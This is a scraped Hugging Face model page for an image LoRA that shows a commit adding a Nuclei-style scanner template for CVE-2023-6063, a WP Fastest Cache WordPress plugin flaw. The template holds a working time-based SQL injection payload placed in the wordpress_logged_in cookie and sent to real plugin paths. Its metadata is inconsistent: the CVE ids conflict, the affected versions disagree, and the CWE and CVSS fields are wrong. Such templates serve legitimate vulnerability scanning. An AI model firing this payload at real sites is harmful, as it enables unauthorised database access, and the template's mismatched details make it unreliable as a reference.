Instructions to use fingerprinted/hellohello with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Diffusers
How to use fingerprinted/hellohello with Diffusers:
pip install -U diffusers transformers accelerate
import torch from diffusers import DiffusionPipeline # switch to "mps" for apple devices pipe = DiffusionPipeline.from_pretrained("digiplay/hellopure_v2.23", dtype=torch.bfloat16, device_map="cuda") pipe.load_lora_weights("fingerprinted/hellohello") prompt = "hellohello" image = pipe(prompt).images[0] - Notebooks
- Google Colab
- Kaggle
- Local Apps Settings
- Draw Things
- DiffusionBee
Add 2 files
Browse files- cve-2023-6063.yaml +42 -0
- images/mz.svg +10 -0
cve-2023-6063.yaml
ADDED
|
@@ -0,0 +1,42 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
id: cve-2023-4723
|
| 2 |
+
|
| 3 |
+
info:
|
| 4 |
+
name: WP Fastest Cache <= 1.2.2 - Unauthenticated SQL Injection
|
| 5 |
+
author: Arpeet & DK
|
| 6 |
+
severity: critical
|
| 7 |
+
description: |
|
| 8 |
+
The WP Fastest Cache plugin for WordPress is vulnerable to SQL Injection via the '$username' variable retrieved via user cookies in all versions up to, and including, 1.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
| 9 |
+
reference:
|
| 10 |
+
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2993550%40wp-fastest-cache&new=2993550%40wp-fastest-cache&sfp_email=&sfph_mail=
|
| 11 |
+
- https://plugins.svn.wordpress.org/wp-fastest-cache/tags/1.2.2/readme.txt
|
| 12 |
+
- https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/
|
| 13 |
+
classification:
|
| 14 |
+
cvss-metrics: CVSS:9.8/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
| 15 |
+
cvss-score: 9.8
|
| 16 |
+
cve-id: CVE-2023-6063
|
| 17 |
+
cwe-id: CWE-200
|
| 18 |
+
|
| 19 |
+
requests:
|
| 20 |
+
|
| 21 |
+
- raw:
|
| 22 |
+
- |
|
| 23 |
+
GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1
|
| 24 |
+
Host: {{Hostname}}
|
| 25 |
+
Cookie: wordpress_logged_in=" AND (SELECT 123 FROM (SELECT(SLEEP(5)))TEST) AND "1"="1;
|
| 26 |
+
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4
|
| 27 |
+
|
| 28 |
+
- |
|
| 29 |
+
GET /wp-login.php HTTP/1.1
|
| 30 |
+
Host: {{Hostname}}
|
| 31 |
+
Cookie: wordpress_logged_in=" AND (SELECT 123 FROM (SELECT(SLEEP(5)))TEST) AND "1"="1;
|
| 32 |
+
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4
|
| 33 |
+
|
| 34 |
+
|
| 35 |
+
matchers-condition: and
|
| 36 |
+
matchers:
|
| 37 |
+
- type: dsl
|
| 38 |
+
dsl:
|
| 39 |
+
- 'duration>=5'
|
| 40 |
+
- type: status
|
| 41 |
+
status:
|
| 42 |
+
- 200
|
images/mz.svg
ADDED
|
|